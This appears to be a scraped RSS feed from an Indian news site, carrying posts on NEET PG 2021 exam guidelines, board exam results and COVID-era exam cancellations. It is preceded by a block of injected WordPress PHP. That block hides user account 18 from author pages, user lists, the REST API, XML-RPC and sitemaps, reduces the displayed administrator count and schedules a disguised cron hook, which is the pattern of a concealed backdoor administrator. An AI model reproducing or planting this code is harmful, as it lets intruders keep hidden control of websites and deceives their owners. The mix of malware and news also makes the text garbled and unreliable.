add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post NEET PG 2021exam guidelines, check out here appeared first on The Edge Media.
]]>NEET PG 2021 admit cards were released by NBE on September 7 on the official website— natboard.edu.in. Students must read all the details mentioned on the admit card along with the guidelines. Check the exam center and get familiar with the address to avoid any hassle on the day of NEET PG 2021 exam.
Students entering into the NEET PG 2021 exam center will be required to present their admit card and a valid ID proof on the main gate. After scanning the admit card, students will be allotted their lab numbers. Students who fail to carry their admit cards or ID proof will not be allowed to enter the exam hall.
Students will be provided with a face shield, face mask and sanitizer sachets. Also, a temperature check will be conducted while entering the exam center. COVID-19 symptomatic students will be allowed to give tests in a separate isolation lab.
Students can carry their personal sanitizer in a transparent bottle, gloves, face mask and a transparent water bottle to the exam hall. However, students are not allowed to take any eatables inside the exam hall.
Carrying any type of electronic devices like calculator, mobile phone, pen drives is strictly prohibited into the exam hall.
The post NEET PG 2021exam guidelines, check out here appeared first on The Edge Media.
]]>The post Girls outshine boys in Board exams appeared first on The Edge Media.
]]>99.13 per cent boys and 99.67 per cent girls have passed the exams this year.
There were 17,016 foreign candidates who appeared for the exams, and 99.92 per cent have passed.
PM Narendra Modi congratulated students, see the tweet here :
https://twitter.com/narendramodi/status/1421046810072817664?s=19
5.37 per cent candidates have scored over 95% on aggregate.
The board exams were cancelled this year in view of the aggressive second wave of Covid-19, and the results were announced on basis of an alternate assessment policy.
The board adopted a 30:30:40 formula to evaluate students based on the results of Class-X, XI and XII examinations respectively.
30% weightage has been given to class X and XI final results, respectively, and 40% to class XII pre-board exams
Some students were unhappy about the marking formula, and wanted that further weightage be given to class XII performance.
However the matter was settled after the marking formula was accpetd by the Supreme Court.
CBSE was the first to cancel Class XII exams on June 1; several other state boards followed.
The post Girls outshine boys in Board exams appeared first on The Edge Media.
]]>The post Exams for classes 9 and 11 are now cancelled, says Manish Sisodiya appeared first on The Edge Media.
]]>“The class 9 and 11 exams, which had been postponed on April 11, have now been cancelled. Private schools which have completed their mid-term and annual exams can declare their exam results and promote students based on that. In schools, where only the mid-term exams have been conducted, schools may use the mid-term exam marks to declare class 9 and 11 results. Where some mid-term papers were conducted but not others, students’ results will be declared on the basis of the two subjects in which they performed the best,” he said. Using the alternate means, government schools have been asked to declare their results on June 22.
He further added, “There are some students who may have written only one paper or no mid-term exams, and some who didn’t pass the mid-term exams. All these children will be given the chance to write exams but not physically. This will be through re-assessment project and assignment for which detailed guidelines will be issued.”
Sisodia also announced that the online registration for admission to Delhi government schools for classes 6 to 9 will begin tomorrow. The registration process will continue till June 30 and the admission lists will be prepared by July 14. For those left behind in this round, another round of registrations will begin on July 23.
The post Exams for classes 9 and 11 are now cancelled, says Manish Sisodiya appeared first on The Edge Media.
]]>The post CM of Tamil Nadu urges PM Modi to cancel all national level entrance exams like NEET appeared first on The Edge Media.
]]>
Tamil Nadu CM , MK Stalin cancelled class 12 board examinations and writes to PM Modi urging him to cancel all level national level entrance examinations like NEET, due to Covid 19.


Mr.Stalin said “Since no announcement on NEET has been made so far , I have written to Prime Minister Narendra Modi to cancel all entrance examinations for admission in higher education.”
He also highlighted that the Centre had already cancelled the CBSE examinations for 12 standard and many other states also had cancelled board examinations.
Remembering the opinions given by medical experts about the possibility of a third wave he said allowing students to write examinations would further increase the spread of infection.
The post CM of Tamil Nadu urges PM Modi to cancel all national level entrance exams like NEET appeared first on The Edge Media.
]]>The post Class 12 board exams: SC to hear plea requesting cancellation of examinations appeared first on The Edge Media.
]]>The petition reads, “In view of the unprecedented health emergency and rising numbers of the COVID-19 cases in the country, the conduct of examination, either offline or online or blended in upcoming weeks is not possible and delay in the examination will cause irreparable loss to the students as time is the essence in taking admission in higher education courses in foreign universities.”
Earlier this year, Class 10 examinations were cancelled considering the increasing severity of the COVID pandemic.
The post Class 12 board exams: SC to hear plea requesting cancellation of examinations appeared first on The Edge Media.
]]>